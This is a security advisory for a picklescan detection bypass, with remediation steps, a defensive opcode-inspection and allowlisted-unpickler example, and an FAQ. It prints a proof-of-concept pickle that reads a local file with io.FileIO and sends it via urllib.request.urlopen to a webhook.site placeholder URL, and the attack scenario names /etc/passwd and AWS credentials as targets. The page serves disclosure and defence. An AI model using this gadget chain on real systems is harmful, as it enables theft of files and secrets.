GHSA-9726-w42j-3qjr: picklescan: Path Traversal enables file access

GHSA-9726-w42j-3qjr HIGH
Published January 8, 2026
CISO Take

picklescan is used as a security gate in ML pipelines to validate pickle files before loading. This vulnerability means that gate is bypassable, giving your team false confidence that pickle files are clean. An attacker can craft a pickle that opens `/etc/passwd` or another sensitive file with `io.FileIO` and streams it to an attacker-controlled URL through `urllib.request.urlopen` at unpickling time, without referencing any of the globals on an RCE-focused blocklist. Upgrade picklescan to 0.0.35 immediately and treat any pickle file cleared by an earlier version as unverified.

Risk Assessment

HIGH. The severity is amplified because the affected component is a security control itself, not just an application library: bypassing it silently degrades your entire pickle validation posture, and nothing downstream raises an alarm. Exploit complexity is low: a working PoC is public, requires no authentication, and chains two standard library modules that are unlikely to appear in RCE blocklists. AI/ML environments are uniquely exposed given the ubiquity of pickle for model and dataset serialization across training, fine-tuning, and serving pipelines.

Affected Systems

Package
picklescan
Ecosystem
pip
Vulnerable range
< 0.0.35
Patched
0.0.35


Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

Recommended Action

5 steps
  1. PATCH

    Upgrade picklescan to >= 0.0.35 immediately across all environments (pip install --upgrade picklescan).

  2. AUDIT

    Treat all pickle files scanned by picklescan < 0.0.35 as unverified; re-scan with the patched version or reload from trusted sources.

  3. MIGRATE

    Prefer safer serialization formats — safetensors for model weights, Parquet/Arrow for datasets — that eliminate pickle deserialization risk entirely.

  4. NETWORK CONTROLS

    Enforce egress filtering on model-loading workers to block unexpected outbound HTTP/HTTPS. This cuts the exfiltration leg even if a malicious pickle executes; note that the local file read itself still happens, so egress control complements the patch rather than replacing it.

  5. DETECT

    Alert on outbound HTTP connections from processes performing model loading. If you run custom detection, inspect the pickle opcode stream for GLOBAL/STACK_GLOBAL references to io.FileIO and urllib.request (rather than grepping for RCE gadgets such as os.system), and flag any module/name pair you have not explicitly allowlisted.
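The opcode-level check in step 5 and the allowlist stance behind it, as an added example written for this page (it is not picklescan's code): it decodes a pickle's import references with `pickletools.genops` without executing anything, shows that a toy RCE blocklist sees nothing in the `io.FileIO` to `urllib.request.urlopen` chain from the advisory PoC while an allowlist flags both imports, and loads only through an `Unpickler` whose `find_class` refuses unknown globals. The sample pickles are constructed in memory; `RCE_BLOCKLIST`, `ALLOWED_GLOBALS` and the `attacker.invalid` URL are illustrative assumptions, and the hostile pickle is never handed to the stock loader, so nothing is read or sent. CPython serialises `io.FileIO` under its implementation module `_io`, so a name-based rule has to cover both spellings.

```python
"""Opcode-level pickle inspection plus an allowlisted loader (added example)."""
import collections
import io
import pickle
import pickletools
import urllib.request


# --- constructed samples (same gadget chain as the advisory PoC) -----------
class _GetFile:
    def __reduce__(self):
        # io.FileIO opens a local file without going through builtins.open.
        return (io.FileIO, ("/etc/hosts", "r"))


class _Exfiltrate:
    def __reduce__(self):
        # urlopen(url, data) would POST the file object as the body at load time.
        # Placeholder URL: this example never unpickles the payload unsafely.
        return (urllib.request.urlopen, ("https://attacker.invalid/collect", _GetFile()))


MALICIOUS_PICKLE = pickle.dumps(_Exfiltrate(), protocol=4)   # serialised, never loaded
BENIGN_PICKLE = pickle.dumps(
    collections.OrderedDict([("weights", [0.1, 0.2]), ("epoch", 3)]), protocol=4)

# Illustrative RCE-oriented blocklist (assumed, not picklescan's real list).
RCE_BLOCKLIST = {("os", "system"), ("posix", "system"), ("subprocess", "Popen"),
                 ("builtins", "exec"), ("builtins", "eval"), ("builtins", "open")}

# Illustrative allowlist: the only globals our own data pickles need.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}

_STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
               "STRING", "BINSTRING", "SHORT_BINSTRING"}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """Every (module, name) the pickle would import, found without executing it.

    GLOBAL/INST carry "module name" inline. STACK_GLOBAL (protocol 4+) consumes
    the two most recent strings, which protocol 4 may replay from the memo
    (MEMOIZE then BINGET), so memo slots holding strings are tracked too.
    """
    found: list[tuple[str, str]] = []
    recent: list[str] = []      # strings pushed directly or fetched from the memo
    memo: dict[int, str] = {}   # memo slot -> string
    next_slot = 0               # slot the next MEMOIZE opcode fills
    top_is_str = False
    for op, arg, pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            found.append((module, name))
            top_is_str = False
        elif op.name in _STRING_OPS:
            recent.append(arg)
            top_is_str = True
        elif op.name == "MEMOIZE":
            if top_is_str:
                memo[next_slot] = recent[-1]
            next_slot += 1
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            if top_is_str:
                memo[arg] = recent[-1]
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            top_is_str = arg in memo
            if top_is_str:
                recent.append(memo[arg])
        elif op.name == "STACK_GLOBAL":
            if len(recent) < 2:
                raise ValueError(f"malformed STACK_GLOBAL at offset {pos}")
            found.append((recent[-2], recent[-1]))
            top_is_str = False
        else:
            top_is_str = False
    return found


def blocklist_hits(data: bytes) -> list[tuple[str, str]]:
    """What an RCE-focused blocklist reports: nothing, for the FileIO/urlopen chain."""
    return [g for g in referenced_globals(data) if g in RCE_BLOCKLIST]


def disallowed_globals(data: bytes) -> list[tuple[str, str]]:
    """Allowlist view: every import not explicitly permitted is a finding."""
    return [g for g in referenced_globals(data) if g not in ALLOWED_GLOBALS]


class RestrictedUnpickler(pickle.Unpickler):
    """find_class runs when GLOBAL/STACK_GLOBAL is processed, before REDUCE calls
    the object, so neither FileIO nor urlopen ever executes."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"forbidden global {module}.{name}")
        return super().find_class(module, name)


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def load_is_blocked(data: bytes) -> bool:
    """True if the restricted loader refuses the pickle."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_PICKLE), ("malicious", MALICIOUS_PICKLE)):
        print(label, "imports:", referenced_globals(blob))
        print("  blocklist hits:", blocklist_hits(blob))
        print("  allowlist findings:", disallowed_globals(blob))
        print("  restricted loader blocks:", load_is_blocked(blob))
```

Run it directly to print both verdicts side by side. The allowlist is the durable control: a blocklist has to enumerate every file and network gadget in the standard library and in every installed package, whereas an allowlist only names the handful of classes your own artifacts actually contain. For model weights the same reasoning leads to safetensors (step 3), which needs no code execution to load at all.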

Classification

Compliance Impact

This advisory is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
Article 9 - Risk management system
ISO 42001
A.10.1 - AI system security
A.8.1 - Suppliers and third parties
NIST AI RMF
MANAGE 2.2 - Mechanisms for AI risk management
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-9726-w42j-3qjr?

GHSA-9726-w42j-3qjr is a detection bypass in picklescan before 0.0.35. A pickle whose `__reduce__` chain calls `io.FileIO` on a local file and passes the resulting file object as the body of a `urllib.request.urlopen` POST reads that file (for example `/etc/passwd`) and sends it to an attacker-controlled URL at unpickling time, and picklescan's RCE-focused blocklist did not flag either import. Because picklescan is used as the security gate that validates pickle files before loading, a clean verdict from an affected version is not trustworthy. Upgrade to 0.0.35 and treat pickle files scanned only by earlier versions as unverified.

Is GHSA-9726-w42j-3qjr actively exploited?

No confirmed active exploitation of GHSA-9726-w42j-3qjr has been reported, but organizations should still patch proactively.

How to fix GHSA-9726-w42j-3qjr?

1. PATCH: Upgrade picklescan to >= 0.0.35 immediately across all environments (pip install --upgrade picklescan).
2. AUDIT: Treat all pickle files scanned by picklescan < 0.0.35 as unverified; re-scan with the patched version or reload from trusted sources.
3. MIGRATE: Prefer safer serialization formats — safetensors for model weights, Parquet/Arrow for datasets — that eliminate pickle deserialization risk entirely.
4. NETWORK CONTROLS: Enforce egress filtering on model-loading workers to block unexpected outbound HTTP/HTTPS, which would mitigate the SSRF exfiltration leg even if a malicious pickle executes.
5. DETECT: Alert on outbound HTTP connections from processes performing model loading. Monitor for `io.FileIO` or `urllib.request` patterns in pickle scanning logs if running custom detection.

What systems are affected by GHSA-9726-w42j-3qjr?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model registries, data preprocessing pipelines.

What is the CVSS score for GHSA-9726-w42j-3qjr?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary

Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.

### Details

The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:

1. io.FileIO: Opens local files without using builtins.open.
2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.
3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.

### PoC

```python
import pickle, io, urllib.request

class GetFile:
    def __reduce__(self):
        # io.FileIO opens the target file without going through builtins.open
        return (io.FileIO, ('/etc/hosts', 'r'))

class Exfiltrate:
    def __reduce__(self):
        # urlopen POSTs the file object as the request body when the pickle is loaded
        return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile()))

with open("bypass_http.pkl", "wb") as f:
    pickle.dump(Exfiltrate(), f)
```

### Impact

- Arbitrary file read

Thanks for this library and your time. If you think `picklescan` is focused on detecting only `RCE` kinds of vulnerabilities, and that adding `File IO`, `Http` or any protocol-based detection may cause a lot of noise, feel free to close this issue.

Exploitation Scenario

An adversary targets an organization's model hub or shared ML artifact repository. They upload a poisoned model checkpoint serialized as a malicious pickle using the PoC technique, chaining `io.FileIO('/etc/passwd', 'r')` as the body of a `urllib.request.urlopen` POST to an attacker-controlled webhook. The organization's CI/CD pipeline runs picklescan (< 0.0.35) on incoming artifacts; the file passes as clean because it references none of the globals on the RCE-focused blocklist, such as `os.system` or `exec`. A downstream data scientist or automated pipeline loads the checkpoint into a training job. During deserialization, before the loaded object is ever used, the server streams its `/etc/passwd` to the attacker's server; a file such as `~/.aws/credentials` or a mounted secret would be exfiltrated the same way.

Timeline

Published
January 8, 2026
Last Modified
January 8, 2026
First Seen
March 24, 2026
